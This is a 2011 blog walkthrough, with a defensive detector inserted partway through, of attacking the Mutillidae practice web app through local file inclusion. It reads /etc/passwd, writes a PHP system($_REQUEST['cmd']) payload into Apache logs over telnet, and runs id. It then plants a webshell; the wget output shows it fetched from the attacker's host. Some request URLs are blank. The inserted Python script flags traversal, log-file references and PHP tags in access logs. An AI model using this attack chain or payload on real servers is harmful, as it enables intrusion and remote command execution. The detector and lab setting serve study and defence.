Monday, 08 August 2011

Local File Inclusion

Today I will share how to upload a shell to a web server through local file inclusion (LFI).
First I tested a web application that is vulnerable to LFI by injecting the page variable like this:
http://192.168.56.101/mutillidae/index.php?page=../
and it returned the errors below:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /opt/lampp/htdocs/mutillidae/index.php on line 352
Warning: include() [function.include]: Failed opening '../' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/mutillidae/index.php on line 352

This means the page includes whatever path it is given, so it can be exploited. The next job was to find the location of /etc/passwd;
the result looked like this:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
avahi:x:104:108:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:105:109::/home/cupsys:/bin/false
haldaemon:x:106:110:Hardware abstraction layer,,,:/var/run/hal:/bin/false
hplip:x:107:7:HPLIP system user,,,:/var/run/hplip:/bin/false
soikrucil:x:1000:1000:SOy,,,:/home/soikrucil:/bin/bash

Next I had to find the location of the error_log and access_log files, so I tried requests like this:


and the results looked like this:

192.168.56.1 - - [09/Aug/2011:21:38:21 +0700] "GET /mutillidae/styles/global-styles.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/jquery.min.js HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu-v.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/ddsmoothmenu.js 

Then I tested error_log the same way:


and the results looked like this:

[Tue Aug 09 21:39:25 2011] [error] [client 192.168.56.1] Invalid method in request \xff\xf4\xff\xfd\x06

That is all the content of the error_log and access_log files.

Now I inject a simple script into the log file by sending a bad request that Apache records as an error.

I opened a console and used telnet to connect to the target on port 80; the session looked like this:


root@bt:~# telnet 192.168.56.101 80
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
GET /<? system ($_REQUEST['cmd']); ?> HTTP/0.1             
HTTP/1.1 400 Bad Request
Date: Tue, 09 Aug 2011 13:45:19 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 399
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80</address>
</body></html>
Connection closed by foreign host. 

This request is written to the error_log and access_log files, which means I can now reach my script through the local file inclusion found earlier.
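From the defender's side, the same walkthrough leaves clear traces in access_log. The following detector is an added example, not code from the original post: it parses Apache common-format lines and flags traversal sequences and log-file references in the request, and PHP tags embedded in a request line (the log-poisoning step). The sample log lines are constructed to resemble the ones above, and the regexes and finding names are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access_log lines modelled on the entries in the post.
SAMPLE_ACCESS_LOG = """\
192.168.56.1 - - [09/Aug/2011:21:38:21 +0700] "GET /mutillidae/styles/global-styles.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:40:02 +0700] "GET /mutillidae/index.php?page=../../../../etc/passwd HTTP/1.1" 200 2104
192.168.56.1 - - [09/Aug/2011:21:45:19 +0700] "GET /<? system ($_REQUEST['cmd']); ?> HTTP/0.1" 400 399
192.168.56.1 - - [09/Aug/2011:21:46:20 +0700] "GET /mutillidae/index.php?page=..%2F..%2F..%2Fopt%2Flampp%2Flogs%2Faccess_log&cmd=id HTTP/1.1" 200 5120
"""

# Apache common log format: ip ident user [timestamp] "request" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%00)')          # directory traversal / null byte
LOG_TARGET_RE = re.compile(r'(access_log|error_log|access\.log|error\.log|/etc/passwd)')
PHP_TAG_RE = re.compile(r'<\?(php|=)?|\?>')                # PHP open/close tags in a request


def classify(line):
    """Return a dict of findings for one log line, or None if it does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # Decode twice so that %2F and double-encoded %252F both become '/'.
    req = unquote(unquote(m.group('req')))
    findings = []
    if PHP_TAG_RE.search(req):
        findings.append('php_tag_in_request')      # log poisoning attempt
    if TRAVERSAL_RE.search(req):
        findings.append('path_traversal')
    if LOG_TARGET_RE.search(req):
        findings.append('sensitive_file_reference')  # log file or /etc/passwd named in request
    return {'ip': m.group('ip'), 'status': m.group('status'), 'findings': findings}


def scan(log_text):
    """Return the alerts (lines with at least one finding) for a block of log text."""
    alerts = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result['findings']:
            alerts.append(result)
    return alerts


if __name__ == '__main__':
    for alert in scan(SAMPLE_ACCESS_LOG):
        print(alert)
```

A 400 response whose request line carries a PHP tag is the poisoning step itself; a later 200 response whose page parameter names the log file is the execution step, so the two findings together are worth a higher-severity alert than either alone.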

Once the log entry had been written, I included the access_log file again:


and I got an error like this:

Warning: system() [function.system]: Cannot execute a blank command in /opt/lampp/logs/access_log on line 32
HTTP/0.1 " 400 399

This means the script was written successfully. Now I try to execute a command such as id,
like this:

and the result of the command:
09/Aug/2011:21:46:20 +0700] "GET /uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) HTTP/0.1 " 400 399 192.168.56.1 - - 

Now it's time to upload my webshell, wahahaha:


I did not really believe my webshell had been uploaded, so I checked the error_log, and it confirmed the file was saved. The result looked like this:

92.168.56.1] request failed: error reading the headers
wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget)
wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget)
--21:58:12-- http://192.168.56.1/shEll.txt
=> `/opt/lampp/htdocs/soi.php'
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2.800 (2.7K) [text/plain]
0K .. 100% 148.35 MB/s
21:58:12 (148.35 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800]
wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget)
wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget)
--21:58:17-- http://192.168.56.1/shEll.txt
=> `/opt/lampp/htdocs/soi.php'
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2.800 (2.7K) [text/plain]
0K .. 100% 140.54 MB/s
21:58:17 (140.54 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800]

And I can access my webshell using the URL:

thanks ....by 5oy..
